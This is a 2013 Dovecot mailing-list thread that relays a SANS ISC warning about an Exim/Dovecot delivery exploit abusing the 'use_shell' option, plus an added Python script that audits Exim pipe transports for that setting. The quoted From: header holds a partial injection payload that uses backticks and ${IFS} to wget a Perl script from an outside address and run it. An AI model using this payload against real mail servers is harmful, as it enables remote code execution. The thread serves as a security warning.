Luigi Rosa
2013-Jun-09 07:58 UTC
[Dovecot] from ISC: Exim/Dovecot exploit making the rounds
One of our readers wrote in to let us know that he had received an attempted
Exim/Dovecot exploit attempt against his email server. The exploit partially
looked like this:

From:
x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com

(Obviously edited for your safety, and I didn't post the whole thing.)

This is an exploit against Dovecot that is using the feature "use_shell" against
itself. This feature, unfortunately, is found in the example wiki on Dovecot's
website, and also in their example configuration. We'd caution anyone that is
using Dovecot to take a look at their configuration and make sure they aren't
using the "use_shell" parameter. Or if you are, make darn sure you know what
you are doing, and how to defend yourself.

https://isc.sans.edu/diary/EximDovecot+exploit+making+the+rounds/15962

Ciao,
luigi

--
/
+--[Luigi Rosa]--
\

The generation of random numbers is too important to be left to chance.
Noel Butler
2013-Jun-09 09:50 UTC
[Dovecot] from ISC: Exim/Dovecot exploit making the rounds
Actually, it is an exploit against dovecot LDA, introduced, and caused by, exim.

On Sun, 2013-06-09 at 09:58 +0200, Luigi Rosa wrote:
> One of our readers wrote in to let us know that he had received an attempted
> Exim/Dovecot exploit attempt against his email server. The exploit partially
> looked like this:
>
> From:
> x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com
>
> (Obviously edited for your safety, and I didn't post the whole thing.)
>
> This is an exploit against Dovecot that is using the feature "use_shell" against
> itself. This feature, unfortunately, is found in the example wiki on Dovecot's
> website, and also in their example configuration. We'd caution anyone that is
> using Dovecot to take a look at their configuration and make sure they aren't
> using the "use_shell" parameter. Or if you are, make darn sure you know what
> you are doing, and how to defend yourself.
>
> https://isc.sans.edu/diary/EximDovecot+exploit+making+the+rounds/15962
>
> Ciao,
> luigi
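
The configuration check recommended in the quoted ISC text, as an added example that is not part of either message: it lists Exim pipe transports that have `use_shell` enabled and notes whether the command also expands `$sender_address`. The sample configuration, its transport names and the deliver path are constructed, and the parser assumes a single file with no `.include` lines, macros or continuation lines.

```python
import re

# Constructed sample Exim configuration (paths and transport names are made up).
SAMPLE_CONF = """\
begin routers
localuser:
  driver = accept
begin transports
dovecot_lda:
  driver = pipe
  command = /usr/lib/dovecot/deliver -f "$sender_address"
  use_shell
safe_lda:
  driver = pipe
  command = /usr/lib/dovecot/deliver -f "$sender_address"
  no_use_shell
remote_smtp:
  driver = smtp
"""

def parse_transports(text):
    """Return {transport: {option: value}} from the 'begin transports' section."""
    transports, current, in_section = {}, None, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if m := re.fullmatch(r"begin\s+(\w+)", line):
            in_section, current = m.group(1) == "transports", None
        elif in_section and (m := re.fullmatch(r"(\w+):", line)):
            current = transports.setdefault(m.group(1), {})
        elif in_section and current is not None:
            name, sep, value = line.partition("=")
            # A bare option name is Exim's way of setting a boolean to true.
            current[name.strip()] = value.strip() if sep else True
    return transports

def shell_enabled(opts):
    """Exim booleans: 'use_shell', 'use_shell = true|yes', 'no_use_shell', 'not_use_shell'."""
    if "no_use_shell" in opts or "not_use_shell" in opts:
        return False
    value = opts.get("use_shell", False)
    return value is True or str(value).lower() in ("true", "yes")

def audit(text):
    """List (transport, command_uses_sender) for pipe transports that run via a shell."""
    return [(name, "$sender_address" in str(opts.get("command", "")))
            for name, opts in parse_transports(text).items()
            if opts.get("driver") == "pipe" and shell_enabled(opts)]
```

Calling `audit()` on the text of a real configuration returns one tuple per transport that needs review; an empty list means no pipe transport in that file enables `use_shell`.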